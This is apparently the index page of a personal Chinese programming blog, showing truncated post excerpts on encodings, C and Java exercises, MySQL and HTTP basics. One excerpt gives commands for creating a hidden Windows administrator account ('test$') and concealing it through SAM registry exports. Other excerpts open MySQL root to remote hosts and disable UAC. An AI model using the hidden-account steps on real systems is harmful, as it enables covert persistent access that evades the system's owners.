会员
周边
新闻
博问
闪存
赞助商
Chat2DB
所有博客
当前博客
我的博客
我的园子
账号设置
会员中心
简洁模式
...
退出登录
注册
登录
Dog17
博客园
首页
新随笔
联系
订阅
管理
上一页
1
2
3
4
下一页
2024年2月20日
cmd更改编码格式
摘要: CHCP 65001(UTF-8格式) CHCP 936(GBK Windows下默认格式)
阅读全文
posted @ 2024-02-20 19:50 Dog17
阅读(47)
评论(0)
推荐(0)
2023年5月29日
共阴极0~9字段码
摘要: 0:0x3f 1:0x06 2:0x5b 3:0x4f 4:0x66 5:0x6d 6:0x7d 7:0x07 8:0x7f 9:0x6f
阅读全文
posted @ 2023-05-29 15:19 Dog17
阅读(642)
评论(0)
推荐(0)
2023年4月16日
#include"stdio.h"和#include<stdio.h>的区别
摘要: 一、应用不同 1、#include"stdio.h" #include "stdio.h"一般用包含项目文件。 2、#include<stdio.h> #include<stdio.h>一般用包含系统文件。 二、查找不同 1、#include"stdio.h" #include"stdio.h"查找
阅读全文
posted @ 2023-04-16 21:44 Dog17
阅读(1132)
评论(0)
推荐(0)
2023年4月15日
KMP算法实现
摘要: #include <stdio.h>// #include <string.h> #include <assert.h> #include<stdlib.h> #define maxlen 255 typedef struct { char ch[maxlen]; int length; }SStr
阅读全文
posted @ 2023-04-15 22:22 Dog17
阅读(45)
评论(0)
推荐(0)
2023年4月11日
求众数
摘要: #include <stdio.h> int num=0; //存放众数 int maxcount=0; //存放重数 void split(int a[],int low,int high,int &mid,int &left,int &right){ mid=(low+high)/2; for
阅读全文
posted @ 2023-04-11 15:34 Dog17
阅读(40)
评论(0)
推荐(0)
2022年11月2日
用java判断数据结构进出栈的顺序是否正确
摘要: //通过flag判断出栈顺序是否正确 import java.util.*; public class E1 { /** * @param args the command line arguments */ public static void main(String args[]) { // i
阅读全文
posted @ 2022-11-02 16:07 Dog17
阅读(183)
评论(0)
推荐(0)
2021年10月27日
解决windows下安装mysql无法远程连接
摘要: select host from user where user='root';upadte user set host='%' where user='root';flush privileges;
阅读全文
posted @ 2021-10-27 15:16 Dog17
阅读(107)
评论(0)
推荐(0)
2021年5月19日
创建隐藏用户
摘要: net user test$ 123 /addnet localgroup administrators test$ /addHKEY_LOCAL_MAHINE\SAM\SAM 权限 导出对应的两个文件users和names,然后删除test$在运行这两文件@echo offreg query(查询
阅读全文
posted @ 2021-05-19 12:42 Dog17
阅读(67)
评论(0)
推荐(0)
2021年4月20日
get与post的区别
摘要: 1、传送方式:get通过地址栏传输,post通过报文传输。2、传送长度:get参数有长度限制(受限于url长度),而post无限制3、GET和POST还有一个重大区别,简单的说:GET产生一个TCP数据包;POST产生两个TCP数据包长的说:对于GET方式的请求,浏览器会把http header和d
阅读全文
posted @ 2021-04-20 18:32 Dog17
阅读(270)
评论(0)
推荐(0)
2021年4月7日
如何关闭UAC
摘要: 右键“此电脑”--点击“属性”--点击“安全和维护”--点击“更改账户配置设置”
阅读全文
posted @ 2021-04-07 17:19 Dog17
阅读(503)
评论(0)
推荐(0)
上一页
1
2
3
4
下一页
公告